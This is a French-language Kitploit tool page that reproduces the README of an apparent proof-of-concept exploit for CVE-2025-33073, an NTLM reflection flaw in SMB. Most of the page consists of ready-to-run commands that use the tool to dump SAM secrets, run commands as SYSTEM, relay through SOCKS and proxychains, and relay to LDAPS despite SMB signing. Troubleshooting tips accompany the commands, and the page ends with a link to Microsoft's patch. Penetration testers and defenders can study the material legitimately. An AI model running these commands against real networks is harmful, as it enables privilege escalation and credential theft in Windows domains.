Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-33073 — Exploit PoC pour la faille de réflexion NTLM SMB. | Kitploit
Outils/GitHubGitHub/mverschu/cve-2025-33073
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationSécurité RéseauTests d'IntrusionAuthentification
GitHubmverschu/cve-2025-33073

CVE-2025-33073

Exploit PoC pour la faille de réflexion NTLM SMB.

Voir le dépôt
714136il y a 6 moisVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-33073

Exploit PoC pour la faille de réflexion NTLM SMB.

image

Tout le crédit va à la recherche officielle :
https://www.synacktiv.com/en/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025

Prérequis

OS : Kali Linux (la plupart des paquets sont préinstallés).

  • NetExec (NXC) - https://github.com/Pennyw0rth/NetExec
  • impacket-ntlmrelayx
  • dnstool.py (inclus dans le dépôt)

Configuration

L'outil utilisera automatiquement un environnement virtuel. Pour le configurer, exécutez :

root@kitploit:~
./setup.sh

Cela créera un environnement virtuel et installera toutes les dépendances requises, y compris ldap3-bleeding-edge==2.10.1.1337.

Exemple d'utilisation

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65
image

Commande personnalisée
Au lieu d'exécuter secretsdump, une commande personnalisée peut être exécutée.

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --custom-command "whoami"

image

SOCKS
Pour une exécution plus discrète des commandes après qu'une connexion valide en tant que SYSTEM a été établie. --target et --target-ip doivent être identiques ici.

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --socks

image Une commande personnalisée peut également être exécutée via proxychains au lieu de vider le SAM.

root@kitploit:~
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec

image

Relais d'exploit vers LDAPS même avec la signature SMB activée

Des recherches ont été menées pour voir si la réflexion ne fonctionnait vraiment pas avec la signature SMB activée, ce qui a conduit à trouver des bugs où, si SIGN/SEAL sont supprimés du paquet, il est possible de relayer de SMB vers LDAPS, ce qui n'est généralement pas possible à cause de MIC.

Remerciements à :

  • https://github.com/decoder-it/impacket-partial-mic/
  • https://decoder.cloud/2025/11/24/reflecting-your-authentication-when-windows-ends-up-talking-to-itself/
  • https://www.depthsecurity.com/blog/using-ntlm-reflection-to-own-active-directory/
root@kitploit:~
python3 CVE-2025-33073.py -u "thewoods.local\test" -p 'pass' -d 192.168.204.131 --dns-ip 192.168.204.133 --dc-fqdn DC01.thewoods.local --target 192.168.204.133 --target-ip 192.168.204.133 -M DFSCoerce --smb-signing
image

Exploitation manuelle sans exigence DNS

Si vous êtes dans le même domaine de diffusion que l'appareil et qu'il est vulnérable à l'empoisonnement LLMNR, il est possible d'exploiter un appareil sans avoir à enregistrer un enregistrement DNS.

image

Dépannage

  • J'ai parfois constaté que l'attaque ne fonctionne pas car le nom d'hôte est utilisé pour l'attaque, ce qui entraîne une requête DNS depuis Kali. Si Kali n'utilise pas le serveur DNS ou si vous obtenez un message '/ FAILED' de impacket-ntlmrelayx, essayez d'ajouter l'hôte à votre fichier /etc/hosts. Cela devrait permettre à l'attaque de fonctionner.
  • Si vous utilisez une IP, l'attaque devrait fonctionner. Parfois, l'exécuter plusieurs fois donnera un SUCCÈS au lieu d'un échec. Jusqu'à présent, on ne comprend pas parfaitement pourquoi cela se produit. Je pense que cela a un rapport avec le réseau.
  • Essayez une autre méthode de coercition en utilisant -M ou --method.

Wireshark

L'authentification NTLM locale a lieu image

L'authentification NTLM locale n'a pas lieu, ce qui entraîne une tentative ÉCHOUÉE image

Bon à savoir

  • L'enregistrement DNS doit également être connu du client, cela peut prendre plus de temps dans certaines occasions. Par plus de temps, j'entends quelques minutes.
  • Ce n'est qu'un PoC, ce qui signifie que les contournements d'AV/EDR n'ont pas été tentés. À utiliser à vos propres risques.

Comment corriger

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33073

Télécharger l’outil